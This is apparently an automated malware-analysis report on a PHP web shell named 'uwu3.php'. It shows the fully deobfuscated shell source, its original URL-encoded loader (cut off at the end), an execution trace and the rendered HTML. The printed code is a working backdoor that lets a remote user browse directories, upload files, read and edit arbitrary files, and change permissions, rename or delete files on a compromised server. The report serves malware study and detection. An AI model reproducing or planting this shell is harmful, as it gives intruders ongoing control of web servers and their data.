uwu3.php

md5: 3322901904b1f4aa0260179dc705e561

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Environment
error_reporting (Deobfuscated, Traces)
getcwd (Deobfuscated, Traces)
php_uname (Deobfuscated, Traces)
set_time_limit (Deobfuscated, Traces)

Files
copy (Deobfuscated)
file_get_contents (Deobfuscated)

Input
_FILES (Deobfuscated)
_GET (Deobfuscated)
_POST (Deobfuscated, Traces)

Title
!!!  FUCK OFF  !!! (Deobfuscated, HTML)

Deobfuscated PHP code
<?php

$i = "<?php\n set_time_limit(0);error_reporting(0);if(get_magic_quotes_gpc()){foreach(\$_POST as \$key=>\$value){\$_POST[\$key]=stripslashes(\$value);}}?>\n<!DOCTYPE html>\n<html lang=\"en-US\">\n\n\t\t <head>\n\t\t\t <meta charset=\"utf-8\">\n\t\t\t <meta name=\"viewport\" content=\"width=device-width\">\n\t\t\t \n\t\t\t\t<title>!!!  FUCK OFF  !!!</title>\n\t\t\t\t<link rel=\"icon\" href=\"//i.ibb.co/VVzr537/black-Pink-Quiz-Game-How-Well-Do-You-Know-The-most.png\" />\n\t\t\t\t<link rel=\"stylesheet\" href=\"//fonts.googleapis.com/css?family=Berkshire+Swash\" type=\"text/css\">\n\t\t\t\t<link rel=\"stylesheet\" href=\"//0x5a455553.github.io/MARIJUANA/MKY.css\" type=\"text/css\">\n\t\t\t\t\n\t\t </head>\n\t\t \n\t\t <body>\n\t\t\t <h1>\n\t\t\t\t<center>\n\t\t\t\t\t<a href=\"<?php \$url=basename(\$_SERVER['PHP_SELF']);echo \$url;?>\">!!!  FUCK OFF  !!!</a>\n\t\t\t\t</center>\n\t\t\t </h1>\n\t\t\t \n\t\t\t <table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\n\t\t\t\t<tr>\n\t\t\t\t\t<td>\n\t\t\t\t\t\t<?php echo php_uname();?>\n\t\t\t\t\t\t\n\t\t\t\t\t\t<br>\n<?php\n if(isset(\$_GET['path'])){\$path=\$_GET['path'];}else {\$path=getcwd();}\$path=str_replace('\\\\','/',\$path);\$paths=explode('/',\$path);foreach(\$paths as \$id=>\$pat){if(\$pat==''&&\$id==0){\$a=true;echo '\n\t\t\t\t\t\t<a class=\"wrn\" href=\"?path=/\">/</a>';continue;}if(\$pat=='')continue;echo '\t\t\t\t\t\t\t\n\t\t\t\t\t\t<a class=\"wrn\" href=\"?path=';for(\$i=0;\$i<=\$id;\$i++){echo \"\$paths[\$i]\";if(\$i!=\$id)echo \"/\";}echo '\">'.\$pat.'</a>/';}echo '\n\t\t\t\t\t</td>\n\t\t\t\t</tr>\n\n\t\t\t\t<tr>\n\t\t\t\t\t<td>';if(isset(\$_FILES['file'])){if(copy(\$_FILES['file']['tmp_name'],\$path.'/'.\$_FILES['file']['name'])){echo '\n\t\t\t\t\t\t<script>alert(\"OK\");</script>\n\t\t\t\t\t\t\n\t\t\t\t\t\t<br>\n\t\t\t\t\t\t';}else{echo '\n\t\t\t\t\t\t<script>alert(\"FAIL\");</script>\n\t\t\t\t\t\t\n\t\t\t\t\t\t<br>\n\t\t\t\t\t\t';}}?>\n\n\t\t\t\t\t\t<form enctype=\"multipart/form-data\" method=\"POST\">\n\t\t\t\t\t\t\t<input type=\"file\" name=\"file\" />\n\t\t\t\t\t\t\t<input type=\"submit\" value=\">>\" />\n\t\t\t\t\t\t</form>\n\t\t\t\t\t</td>\n\t\t\t\t</tr>\n<?php\n if(isset(\$_GET['filesrc'])){echo \"\t\t\t\t<tr>\n\t\t\t\t\t<td>\n\t\t\t\t\t\n\t\t\t\t\t<br>\n\t\t\t\t\t\n\t\t\t\t\t<center>\n\t\t\t\t\t\";echo \"<font color=\\\"#00FF66 \\\">\".\$_GET['filesrc'].\"</font>\";echo '\n\t\t\t\t\t</center>\n\t\t\t\t\t</td>\n\t\t\t\t</tr>\n\t\t\t</table>\n\t\t\t\n\t\t\t<br>';echo('\n\t\t\t\n\t\t\t<pre>\n'.htmlspecialchars(file_get_contents(\$_GET['filesrc'])).'\t\t\t\n\t\t\t</pre>');}elseif(isset(\$_GET['option'])&&\$_POST['opt']!='delete'){echo '\t\t\t\t</table>\n\t\t \n\t\t\t\t<br>\n\t\t \n\t\t\t\t<center>'.\$_POST['path'].'\n\t\t\t\t\n\t\t\t\t<br>\n\t\t\t\t<br>';if(\$_POST['opt']=='chmod'){if(isset(\$_POST['perm'])){if(chmod(\$_POST['path'],\$_POST['perm'])){echo '\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"OK\");</script>\n\t\t\t\t\n\t\t\t\t<br>';}else{echo '\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"FAIL\");</script>\n\t\t\t\t\n\t\t\t\t<br>';}}?>\n\n\n\t\t\t\t<form method=\"POST\">\n\t\t\t\t\tPermission : \n\t\t\t\t\t<input name=\"perm\" type=\"text\" size=\"4\" value=\"<?php echo substr(sprintf('%o',fileperms(\$_POST['path'])),-4);?>\" />\n\t\t\t\t\t<input type=\"hidden\" name=\"path\" value=\"<?php echo \$_POST['path'];?>\">\n\t\t\t\t\t<input type=\"hidden\" name=\"opt\" value=\"chmod\">\n\t\t\t\t\t<input type=\"submit\" value=\">>\" />\n\t\t\t\t</form>\n<?php\n }elseif(\$_POST['opt']=='rename'){if(isset(\$_POST['newname'])){if(rename(\$_POST['path'],\$path.'/'.\$_POST['newname'])){echo '\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"OK\");</script>\n\t\t\t\t\n\t\t\t\t<br>';}else{echo '\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"FAIL\");</script>\n\t\t\t\t\n\t\t\t\t<br>';}\$_POST['name']=\$_POST['newname'];}?>\n\n\n\t\t\t\t<form method=\"POST\">\n\t\t\t\t\tNew Name : \n\t\t\t\t\t<input name=\"newname\" type=\"text\" size=\"20\" value=\"<?php echo \$_POST['name'];?>\" />\n\t\t\t\t\t<input type=\"hidden\" name=\"path\" value=\"<?php echo \$_POST['path'];?>\">\n\t\t\t\t\t<input type=\"hidden\" name=\"opt\" value=\"rename\">\n\t\t\t\t\t<input type=\"submit\" value=\">>\" />\n\t\t\t\t</form>\n<?php\n }elseif(\$_POST['opt']=='edit'){if(isset(\$_POST['src'])){\$fp=fopen(\$_POST['path'],'w');if(fwrite(\$fp,\$_POST['src'])){echo '\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"OK\");</script>\n\t\t\t\t\n\t\t\t\t<br>';}else{echo '\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"FAIL\");</script>\n\t\t\t\t\n\t\t\t\t<br>';}fclose(\$fp);}?>\n\n\n\t\t\t\t<form method=\"POST\">\n\t\t\t\t\n\t\t\t\t\t<textarea cols=80 rows=20 name=\"src\">\n<?php echo htmlspecialchars(file_get_contents(\$_POST['path']));?>\n</textarea>\n\t\t\t\t\t\n\t\t\t\t\t<br>\n\t\t\t\t\t\n\t\t\t\t\t<input type=\"hidden\" name=\"path\" value=\"<?php echo \$_POST['path'];?>\">\n\t\t\t\t\t<input type=\"hidden\" name=\"opt\" value=\"edit\">\n\t\t\t\t\t<input type=\"submit\" value=\">>\" />\n\t\t\t\t</form>\n<?php\n }echo '\t\t\t\t</center>';}else{echo '\t\t\t </table>\n\t\t \n\t\t\t <br>\n\t\t \n\t\t\t <center>';if(isset(\$_GET['option'])&&\$_POST['opt']=='delete'){if(\$_POST['type']=='dir'){if(rmdir(\$_POST['path'])){echo '\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"OK\");</script>\n\t\t\t\t\n\t\t\t\t<br>';}else{echo '\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"FAIL\");</script>\n\t\t\t\t\n\t\t\t\t<br>';}}elseif(\$_POST['type']=='file'){if(unlink(\$_POST['path'])){echo '\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"OK\");</script>\n\t\t\t\t\n\t\t\t\t<br>';}else{echo '\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"FAIL\");</script>\n\t\t\t\t\n\t\t\t\t<br>';}}}echo '</center>';\$scandir=scandir(\$path);?>\n\n\n\t\t\t <div id=\"content\">\n\t\t\t\t<table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\n\t\t\t\t\t<tr class=\"first\">\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<center>Name</center>\n\t\t\t\t\t\t</td>\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<center>Size</center>\n\t\t\t\t\t\t</td>\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<center>Permissions</center>\n\t\t\t\t\t\t</td>\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<center>Options</center>\n\t\t\t\t\t\t</td>\n\t\t\t\t\t</tr>\n\t\t\t\t\t\n<?php\n foreach(\$scandir as \$dir){if(!is_dir(\"\$path/\$dir\")||\$dir=='.'||\$dir=='..')continue;echo \"\t\t\t\t\t\n\t\t\t\t\t<tr>\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<a class=\\\"wrn\\\" href=\\\"?path=\$path/\$dir\\\">\$dir</a>\n\t\t\t\t\t\t</td>\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<center>--</center>\n\t\t\t\t\t\t</td>\t\t\t\t\t\t\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<center>\";if(is_writable(\"\$path/\$dir\"))echo '<font color=\"#00BB00\">';elseif(!is_readable(\"\$path/\$dir\"))echo '<font color=\"red\">';echo perms(\"\$path/\$dir\");if(is_writable(\"\$path/\$dir\")||!is_readable(\"\$path/\$dir\"))echo '</font>';echo \"</center>\n\t\t\t\t\t\t</td>\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<center>\n\t\t\t\t\t\t\t\t<form method=\\\"POST\\\" action=\\\"?option&path=\$path\\\">\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t<select name=\\\"opt\\\">\n\t\t\t\t\t\t\t\t\t\t<option value=\\\"\\\"></option>\n\t\t\t\t\t\t\t\t\t\t<option value=\\\"delete\\\">Delete</option>\n\t\t\t\t\t\t\t\t\t\t<option value=\\\"chmod\\\">Chmod</option>\n\t\t\t\t\t\t\t\t\t\t<option value=\\\"rename\\\">Rename</option>\n\t\t\t\t\t\t\t\t\t</select>\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t<input type=\\\"hidden\\\" name=\\\"type\\\" value=\\\"dir\\\">\n\t\t\t\t\t\t\t\t\t<input type=\\\"hidden\\\" name=\\\"name\\\" value=\\\"\$dir\\\">\n\t\t\t\t\t\t\t\t\t<input type=\\\"hidden\\\" name=\\\"path\\\" value=\\\"\$path/\$dir\\\">\n\t\t\t\t\t\t\t\t\t<input type=\\\"submit\\\" value=\\\">>\\\" />\n\t\t\t\t\t\t\t\t</form>\n\t\t\t\t\t\t\t</center>\n\t\t\t\t\t\t</td>\n\t\t\t\t\t</tr>\";}?>\n\n\t\t\t\t\t<tr class=\"first\">\n\t\t\t\t\t\t<td></td>\n\t\t\t\t\t\t<td></td>\n\t\t\t\t\t\t<td></td>\n\t\t\t\t\t\t<td></td>\n\t\t\t\t\t</tr>\n<?php\n foreach(\$scandir as \$file){if(!is_file(\"\$path/\$file\"))continue;\$size=filesize(\"\$path/\$file\")/1024;\$size=round(\$size,3);if(\$size>=1024){\$size=round(\$size/1024,2).' MB';}else{\$size=\$size.' KB';}echo \"\t\t\t\t\t<tr>\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<a class=\\\"wrn\\\" href=\\\"?filesrc=\$path/\$file&path=\$path\\\">\$file</a>\n\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<center>\".\$size.\"</center>\n\t\t\t\t\t\t</td>\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<center>\";if(is_writable(\"\$path/\$file\"))echo '\n\t\t\t\t\t\t\t\t<font color=\"#00BB00\">';elseif(!is_readable(\"\$path/\$file\"))echo '\n\t\t\t\t\t\t\t\t<font color=\"red\">';echo perms(\"\$path/\$file\");if(is_writable(\"\$path/\$file\")||!is_readable(\"\$path/\$file\"))echo '</font>';echo \"\n\t\t\t\t\t\t\t</center>\n\t\t\t\t\t\t</td>\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<center>\n\t\t\t\t\t\t\t\t<form method=\\\"POST\\\" action=\\\"?option&path=\$path\\\">\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t<select name=\\\"opt\\\">\n\t\t\t\t\t\t\t\t\t\t<option value=\\\"\\\"></option>\n\t\t\t\t\t\t\t\t\t\t<option value=\\\"delete\\\">Delete</option>\n\t\t\t\t\t\t\t\t\t\t<option value=\\\"chmod\\\">Chmod</option>\n\t\t\t\t\t\t\t\t\t\t<option value=\\\"rename\\\">Rename</option>\n\t\t\t\t\t\t\t\t\t\t<option value=\\\"edit\\\">Edit</option>\n\t\t\t\t\t\t\t\t\t</select>\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t<input type=\\\"hidden\\\" name=\\\"type\\\" value=\\\"file\\\">\n\t\t\t\t\t\t\t\t\t<input type=\\\"hidden\\\" name=\\\"name\\\" value=\\\"\$file\\\">\n\t\t\t\t\t\t\t\t\t<input type=\\\"hidden\\\" name=\\\"path\\\" value=\\\"\$path/\$file\\\">\n\t\t\t\t\t\t\t\t\t<input type=\\\"submit\\\" value=\\\">>\\\" />\n\t\t\t\t\t\t\t\t</form>\n\t\t\t\t\t\t\t</center>\n\t\t\t\t\t\t</td>\n\t\t\t\t\t</tr>\";}echo '\n\t\t\t\t</table>\n\t\t\t</div>';}?>\n\n\n\t\t\t<br>\n\t\t\t\n\t\t\t<div class=\"footer\">Hit me [at] <font color=\"red\">sgtsans%XMR\n function perms(\$file){\$perms=fileperms(\$file);if((\$perms&0xC000)==0xC000){\$info='s';}elseif((\$perms&0xA000)==0xA000){\$info='l';}elseif((\$perms&0x8000)==0x8000){\$info='-';}elseif((\$perms&0x6000)==0x6000){\$info='b';}elseif((\$perms&0x4000)==0x4000){\$info='d';}elseif((\$perms&0x2000)==0x2000){\$info='c';}elseif((\$perms&0x1000)==0x1000){\$info='p';}else {\$info='u';}\$info.=((\$perms&0x0100)?'r':'-');\$info.=((\$perms&0x0080)?'w':'-');\$info.=((\$perms&0x0040)?((\$perms&0x0800)?'s':'x'):((\$perms&0x0800)?'S':'-'));\$info.=((\$perms&0x0020)?'r':'-');\$info.=((\$perms&0x0010)?'w':'-');\$info.=((\$perms&0x0008)?((\$perms&0x0400)?'s':'x'):((\$perms&0x0400)?'S':'-'));\$info.=((\$perms&0x0004)?'r':'-');\$info.=((\$perms&0x0002)?'w':'-');\$info.=((\$perms&0x0001)?((\$perms&0x0200)?'t':'x'):((\$perms&0x0200)?'T':'-'));return \$info;}?>";
function x($i)
{
    $t = tempnam("/tmp", "0");
    $h = fopen($t, "w+");
    fwrite($h, $i);
    fclose($h);
    require $t;
    unlink($t);
    return get_defined_vars();
}
extract(x($i));
Execution traces
data/traces/3322901904b1f4aa0260179dc705e561_trace-1676254293.3868.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:11:59.284596]
1	0	1	0.000183	393512
1	3	0	0.000320	417024	{main}	1		/var/www/html/uploads/uwu3.php	0	0
2	4	0	0.000338	417024	rawurldecode	0		/var/www/html/uploads/uwu3.php	2	1	'%3C%3Fphp%0A%20set_time_limit%280%29%3Berror_reporting%280%29%3Bif%28get_magic_quotes_gpc%28%29%29%7Bforeach%28%24_POST%20as%20%24key%3D%3E%24value%29%7B%24_POST%5B%24key%5D%3Dstripslashes%28%24value%29%3B%7D%7D%3F%3E%0A%3C%21DOCTYPE%20html%3E%0A%3Chtml%20lang%3D%22en-US%22%3E%0A%0A%09%09%20%3Chead%3E%0A%09%09%09%20%3Cmeta%20charset%3D%22utf-8%22%3E%0A%09%09%09%20%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3Ddevice-width%22%3E%0A%09%09%09%20%0A%09%09%09%09%3Ctitle%3E%21%21%21%20%20FUCK%20OFF%20%20%'
2	4	1	0.000519	437536
2	4	R			'<?php\n set_time_limit(0);error_reporting(0);if(get_magic_quotes_gpc()){foreach($_POST as $key=>$value){$_POST[$key]=stripslashes($value);}}?>\n<!DOCTYPE html>\n<html lang="en-US">\n\n\t\t <head>\n\t\t\t <meta charset="utf-8">\n\t\t\t <meta name="viewport" content="width=device-width">\n\t\t\t \n\t\t\t\t<title>!!!  FUCK OFF  !!!</title>\n\t\t\t\t<link rel="icon" href="//i.ibb.co/VVzr537/black-Pink-Quiz-Game-How-Well-Do-You-Know-The-most.png" />\n\t\t\t\t<link rel="stylesheet" href="//fonts.googleapis.com/cs'
1		A						/var/www/html/uploads/uwu3.php	2	$i = '<?php\n set_time_limit(0);error_reporting(0);if(get_magic_quotes_gpc()){foreach($_POST as $key=>$value){$_POST[$key]=stripslashes($value);}}?>\n<!DOCTYPE html>\n<html lang="en-US">\n\n\t\t <head>\n\t\t\t <meta charset="utf-8">\n\t\t\t <meta name="viewport" content="width=device-width">\n\t\t\t \n\t\t\t\t<title>!!!  FUCK OFF  !!!</title>\n\t\t\t\t<link rel="icon" href="//i.ibb.co/VVzr537/black-Pink-Quiz-Game-How-Well-Do-You-Know-The-most.png" />\n\t\t\t\t<link rel="stylesheet" href="//fonts.googleapis.com/cs'
2	5	0	0.000630	437504	x	1		/var/www/html/uploads/uwu3.php	14	1	'<?php\n set_time_limit(0);error_reporting(0);if(get_magic_quotes_gpc()){foreach($_POST as $key=>$value){$_POST[$key]=stripslashes($value);}}?>\n<!DOCTYPE html>\n<html lang="en-US">\n\n\t\t <head>\n\t\t\t <meta charset="utf-8">\n\t\t\t <meta name="viewport" content="width=device-width">\n\t\t\t \n\t\t\t\t<title>!!!  FUCK OFF  !!!</title>\n\t\t\t\t<link rel="icon" href="//i.ibb.co/VVzr537/black-Pink-Quiz-Game-How-Well-Do-You-Know-The-most.png" />\n\t\t\t\t<link rel="stylesheet" href="//fonts.googleapis.com/cs'
3	6	0	0.000679	437504	tempnam	0		/var/www/html/uploads/uwu3.php	6	2	'/tmp'	'0'
3	6	1	0.000723	437608
3	6	R			'/tmp/03fhAYg'
2		A						/var/www/html/uploads/uwu3.php	6	$t = '/tmp/03fhAYg'
3	7	0	0.000751	437544	fopen	0		/var/www/html/uploads/uwu3.php	7	2	'/tmp/03fhAYg'	'w+'
3	7	1	0.000782	438184
3	7	R			resource(4) of type (stream)
2		A						/var/www/html/uploads/uwu3.php	7	$h = resource(4) of type (stream)
3	8	0	0.000810	438112	fwrite	0		/var/www/html/uploads/uwu3.php	8	2	resource(4) of type (stream)	'<?php\n set_time_limit(0);error_reporting(0);if(get_magic_quotes_gpc()){foreach($_POST as $key=>$value){$_POST[$key]=stripslashes($value);}}?>\n<!DOCTYPE html>\n<html lang="en-US">\n\n\t\t <head>\n\t\t\t <meta charset="utf-8">\n\t\t\t <meta name="viewport" content="width=device-width">\n\t\t\t \n\t\t\t\t<title>!!!  FUCK OFF  !!!</title>\n\t\t\t\t<link rel="icon" href="//i.ibb.co/VVzr537/black-Pink-Quiz-Game-How-Well-Do-You-Know-The-most.png" />\n\t\t\t\t<link rel="stylesheet" href="//fonts.googleapis.com/cs'
3	8	1	0.000873	438176
3	8	R			8603
3	9	0	0.000887	438112	fclose	0		/var/www/html/uploads/uwu3.php	9	1	resource(4) of type (stream)
3	9	1	0.001044	437712
3	9	R			TRUE
3	10	0	0.001312	482848	require	1	/tmp/03fhAYg	/var/www/html/uploads/uwu3.php	10	0
4	11	0	0.001331	482848	set_time_limit	0		/tmp/03fhAYg	2	1	0
4	11	1	0.001346	482912
4	11	R			FALSE
4	12	0	0.001360	482880	error_reporting	0		/tmp/03fhAYg	2	1	0
4	12	1	0.001371	482920
4	12	R			22527
4	13	0	0.001384	482880	get_magic_quotes_gpc	0		/tmp/03fhAYg	2	0
4	13	1	0.001395	482880
4	13	R			FALSE
4	14	0	0.001410	482880	basename	0		/tmp/03fhAYg	20	1	'/uploads/uwu3.php'
4	14	1	0.001424	482952
4	14	R			'uwu3.php'
3		A						/tmp/03fhAYg	20	$url = 'uwu3.php'
4	15	0	0.001448	482920	php_uname	0		/tmp/03fhAYg	27	0
4	15	1	0.001461	483032
4	15	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
4	16	0	0.001481	482920	getcwd	0		/tmp/03fhAYg	31	0
4	16	1	0.001493	482968
4	16	R			'/var/www/html/uploads'
3		A						/tmp/03fhAYg	31	$path = '/var/www/html/uploads'
4	17	0	0.001518	482968	str_replace	0		/tmp/03fhAYg	31	3	'\\'	'/'	'/var/www/html/uploads'
4	17	1	0.001535	483064
4	17	R			'/var/www/html/uploads'
3		A						/tmp/03fhAYg	31	$path = '/var/www/html/uploads'
4	18	0	0.001558	482968	explode	0		/tmp/03fhAYg	31	2	'/'	'/var/www/html/uploads'
4	18	1	0.001572	483544
4	18	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3		A						/tmp/03fhAYg	31	$paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3		A						/tmp/03fhAYg	31	$id = 0
3		A						/tmp/03fhAYg	31	$a = TRUE
3		A						/tmp/03fhAYg	31	$id = 1
3		A						/tmp/03fhAYg	33	$i = 0
3		A						/tmp/03fhAYg	33	$i++
3		A						/tmp/03fhAYg	33	$i++
3		A						/tmp/03fhAYg	31	$id = 2
3		A						/tmp/03fhAYg	33	$i = 0
3		A						/tmp/03fhAYg	33	$i++
3		A						/tmp/03fhAYg	33	$i++
3		A						/tmp/03fhAYg	33	$i++
3		A						/tmp/03fhAYg	31	$id = 3
3		A						/tmp/03fhAYg	33	$i = 0
3		A						/tmp/03fhAYg	33	$i++
3		A						/tmp/03fhAYg	33	$i++
3		A						/tmp/03fhAYg	33	$i++
3		A						/tmp/03fhAYg	33	$i++
3		A						/tmp/03fhAYg	31	$id = 4
3		A						/tmp/03fhAYg	33	$i = 0
3		A						/tmp/03fhAYg	33	$i++
3		A						/tmp/03fhAYg	33	$i++
3		A						/tmp/03fhAYg	33	$i++
3		A						/tmp/03fhAYg	33	$i++
3		A						/tmp/03fhAYg	33	$i++
4	19	0	0.001792	483472	scandir	0		/tmp/03fhAYg	160	1	'/var/www/html/uploads'
4	19	1	0.001836	484096
4	19	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'uwu3.php']
3		A						/tmp/03fhAYg	160	$scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'uwu3.php']
4	20	0	0.001874	484112	is_dir	0		/tmp/03fhAYg	181	1	'/var/www/html/uploads/.'
4	20	1	0.001890	484176
4	20	R			TRUE
4	21	0	0.001904	484144	is_dir	0		/tmp/03fhAYg	181	1	'/var/www/html/uploads/..'
4	21	1	0.001919	484192
4	21	R			TRUE
4	22	0	0.001932	484152	is_dir	0		/tmp/03fhAYg	181	1	'/var/www/html/uploads/.htaccess'
4	22	1	0.001948	484192
4	22	R			FALSE
4	23	0	0.001960	484152	is_dir	0		/tmp/03fhAYg	181	1	'/var/www/html/uploads/data'
4	23	1	0.001976	484192
4	23	R			TRUE
4	24	0	0.001990	484152	is_writable	0		/tmp/03fhAYg	190	1	'/var/www/html/uploads/data'
4	24	1	0.002009	484192
4	24	R			TRUE
3	10	1	0.002033	485864
2	5	1	0.002048	440696
2	5	R			NULL
1	3	1	0.002062	440696
1	25	0	0.002070	440728	Error->__toString	0		Unknown	0	0
2	26	0	0.002084	440808	Error->getTraceAsString	0		Unknown	0	0
2	26	1	0.002097	441064
2	26	R			'#0 /var/www/html/uploads/uwu3.php(10): require()\n#1 /var/www/html/uploads/uwu3.php(14): x(5)\n#2 {main}'
1	25	1	0.002118	441360
1	25	R			'Error: Call to undefined function perms() in /tmp/03fhAYg:190\nStack trace:\n#0 /var/www/html/uploads/uwu3.php(10): require()\n#1 /var/www/html/uploads/uwu3.php(14): x(5)\n#2 {main}'
			0.002189	362008
TRACE END   [2023-02-13 00:11:59.286640]

Generated HTML code
<html lang="en-US"><head>
			 <meta charset="utf-8">
			 <meta name="viewport" content="width=device-width">
			 
				<title>!!!  FUCK OFF  !!!</title>
				<link rel="icon" href="//i.ibb.co/VVzr537/black-Pink-Quiz-Game-How-Well-Do-You-Know-The-most.png">
				<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Berkshire+Swash" type="text/css">
				<link rel="stylesheet" href="//0x5a455553.github.io/MARIJUANA/MKY.css" type="text/css">
				
		 </head>
		 
		 <body>
			 <h1>
				<center>
					<a href="uwu3.php">!!!  FUCK OFF  !!!</a>
				</center>
			 </h1>
			 
			 <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
				<tbody><tr>
					<td>
						Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64						
						<br>

						<a class="wrn" href="?path=/">/</a>							
						<a class="wrn" href="?path=/var">var</a>/							
						<a class="wrn" href="?path=/var/www">www</a>/							
						<a class="wrn" href="?path=/var/www/html">html</a>/
					</td>
				</tr>

				<tr>
					<td>
						<form enctype="multipart/form-data" method="POST">
							<input type="file" name="file">
							<input type="submit" value=">>">
						</form>
					</td>
				</tr>
			 </tbody></table>
		 
			 <br>
		 
			 <center></center>

			 <div id="content">
				<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
					<tbody><tr class="first">
						<td>
							<center>Name</center>
						</td>
						<td>
							<center>Size</center>
						</td>
						<td>
							<center>Permissions</center>
						</td>
						<td>
							<center>Options</center>
						</td>
					</tr>
					

					<tr class="first">
						<td></td>
						<td></td>
						<td></td>
						<td></td>
					</tr>
					<tr>
						<td>
							<a class="wrn" href="?filesrc=/var/www/html/beneri.se_malware_analysis&amp;path=/var/www/html">beneri.se_malware_analysis</a>
						</td>
						
						<td>
							<center>0 KB</center>
						</td>
						<td>
							<center></center></td></tr></tbody></table></div></body></html>
Original PHP code
<?php
   $i = rawurldecode("%3C%3Fphp%0A%20set_time_limit%280%29%3Berror_reporting%280%29%3Bif%28get_magic_quotes_gpc%28%29%29%7Bforeach%28%24_POST%20as%20%24key%3D%3E%24value%29%7B%24_POST%5B%24key%5D%3Dstripslashes%28%24value%29%3B%7D%7D%3F%3E%0A%3C%21DOCTYPE%20html%3E%0A%3Chtml%20lang%3D%22en-US%22%3E%0A%0A%09%09%20%3Chead%3E%0A%09%09%09%20%3Cmeta%20charset%3D%22utf-8%22%3E%0A%09%09%09%20%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3Ddevice-width%22%3E%0A%09%09%09%20%0A%09%09%09%09%3Ctitle%3E%21%21%21%20%20FUCK%20OFF%20%20%21%21%21%3C%2Ftitle%3E%0A%09%09%09%09%3Clink%20rel%3D%22icon%22%20href%3D%22%2F%2Fi.ibb.co%2FVVzr537%2Fblack-Pink-Quiz-Game-How-Well-Do-You-Know-The-most.png%22%20%2F%3E%0A%09%09%09%09%3Clink%20rel%3D%22stylesheet%22%20href%3D%22%2F%2Ffonts.googleapis.com%2Fcss%3Ffamily%3DBerkshire%2BSwash%22%20type%3D%22text%2Fcss%22%3E%0A%09%09%09%09%3Clink%20rel%3D%22stylesheet%22%20href%3D%22%2F%2F0x5a455553.github.io%2FMARIJUANA%2FMKY.css%22%20type%3D%22text%2Fcss%22%3E%0A%09%09%09%09%0A%09%09%20%3C%2Fhead%3E%0A%09%09%20%0A%09%09%20%3Cbody%3E%0A%09%09%09%20%3Ch1%3E%0A%09%09%09%09%3Ccenter%3E%0A%09%09%09%09%09%3Ca%20href%3D%22%3C%3Fphp%20%24url%3Dbasename%28%24_SERVER%5B%27PHP_SELF%27%5D%29%3Becho%20%24url%3B%3F%3E%22%3E%21%21%21%20%20FUCK%20OFF%20%20%21%21%21%3C%2Fa%3E%0A%09%09%09%09%3C%2Fcenter%3E%0A%09%09%09%20%3C%2Fh1%3E%0A%09%09%09%20%0A%09%09%09%20%3Ctable%20width%3D%22700%22%20border%3D%220%22%20cellpadding%3D%223%22%20cellspacing%3D%221%22%20align%3D%22center%22%3E%0A%09%09%09%09%3Ctr%3E%0A%09%09%09%09%09%3Ctd%3E%0A%09%09%09%09%09%09%3C%3Fphp%20echo%20php_uname%28%29%3B%3F%3E%0A%09%09%09%09%09%09%0A%09%09%09%09%09%09%3Cbr%3E%0A%3C%3Fphp%0A%20if%28isset%28%24_GET%5B%27path%27%5D%29%29%7B%24path%3D%24_GET%5B%27path%27%5D%3B%7Delse%20%7B%24path%3Dgetcwd%28%29%3B%7D%24path%3Dstr_replace%28%27%5C%5C%27%2C%27%2F%27%2C%24path%29%3B%24paths%3Dexplode%28%27%2F%27%2C%24path%29%3Bforeach%28%24paths%20as%20%24id%3D%3E%24pat%29%7Bif%28%24pat%3D%3D%27%27%26%26%24id%3D%3D0%29%7B%24a%3Dtrue%3Becho%20%27%0A%09%09%09%09%09%09%3Ca%20class%3D%22wrn%22%20href%3D%22%3Fpath%3D%2F%22%3E%2F%3C%2Fa%3E%27%3Bcontinue%3B%7Dif%28%24pat%3D%3D%27%27%29continue%3Becho%20%27%09%09%09%09%09%09%09%0A%09%09%09%09%09%09%3Ca%20class%3D%22wrn%22%20href%3D%22%3Fpath%3D%27%3Bfor%28%24i%3D0%3B%24i%3C%3D%24id%3B%24i%2